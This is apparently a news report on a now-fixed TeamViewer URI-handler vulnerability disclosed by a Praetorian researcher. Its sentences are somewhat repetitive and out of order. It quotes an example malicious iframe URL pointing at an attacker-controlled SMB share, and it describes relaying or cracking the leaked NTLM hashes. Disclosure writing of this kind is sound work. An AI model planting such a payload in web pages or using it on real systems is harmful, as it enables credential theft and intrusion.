The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. The TeamViewer project has fixed the issue by quoting the parameters passed by the affected URI handlers. “Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).” “An attacker could embed a malicious iframe in a website with a crafted URL ( iframe src='teamviewer10: -play \\attacker-IP\share\s') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw. Upon clicking the link shared with the victims, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share. The attacker could embed a malicious iframe on a website and then trick victims into visiting that maliciously URL. This means that the SMB authentication process will leak the system’s username, and NTLMv2 hashed version of the password to the attackers. The issue in the TeamViewer’s URI scheme allows a web page crafted by the attack to trick the application installed on the victim’s system into initiating a connection to the attacker-owned remote SMB share. The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system. The vulnerability was discovered by the researcher Jeffrey Hofmann from Praetorian, it resides in the way TeamViewer quotes its custom URI handlers. The vulnerability, classified as an “Unquoted URI handler”, could be triggered by tricking the victims into visiting a malicious web site. TeamViewer is a popular software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers
0 kommentar(er)
